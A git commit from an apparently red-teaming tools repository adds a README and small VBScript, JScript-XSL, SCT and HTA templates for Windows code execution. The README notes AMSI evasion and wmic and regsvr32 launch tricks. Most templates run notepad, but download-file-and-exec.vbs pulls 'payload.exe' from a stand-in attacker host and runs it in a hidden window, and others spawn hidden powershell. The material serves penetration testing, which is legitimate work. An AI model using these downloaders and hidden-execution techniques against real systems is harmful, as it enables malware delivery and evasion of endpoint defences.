Added code-exec-templates

This commit is contained in:
Mariusz B. / mgeeky 2020-05-06 19:22:32 +02:00
parent ce933bb1c5
commit 8e976e7cee
10 changed files with 207 additions and 0 deletions

View File

@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements. - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc)) . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))

View File

@ -0,0 +1,57 @@
### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
#### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
#### JScript
#### XSL
XSL files can be executed in the following ways:
- Using `wmic.exe`:
```
wmic os get /format:"jscript-xslt-template.xsl"
```
Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
#### COM Scriptlets
Sample code execution with `regsvr32` can be following:
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
#### HTA
HTA files are HTML Applications
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_

View File

@ -0,0 +1,38 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
MsgBox cmd
sh.Run cmd, 0, False
End If
Set sh = Nothing
Set xhr = Nothing

View File

@ -0,0 +1,15 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Hello world
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!");
]]> </ms:script>
</stylesheet>

View File

@ -0,0 +1,20 @@
'
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create command, Null, conf, intProcessID

View File

@ -0,0 +1,13 @@
'
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
With CreateObject("WScript.Shell")
.Run command, 0, False
End With

View File

@ -0,0 +1,15 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]>
</script>
</registration>
</scriptlet>

View File

@ -0,0 +1,14 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
</stylesheet>

View File

@ -0,0 +1,14 @@
<html>
<head>
<script language="VBScript">
Sub foo
command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run command
End Sub
foo()
</script>
</head>
<body>
</body>
</html>

View File

@ -0,0 +1,19 @@
'
' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine command
.StdIn.WriteBlankLines 1
.Terminate
End With
End With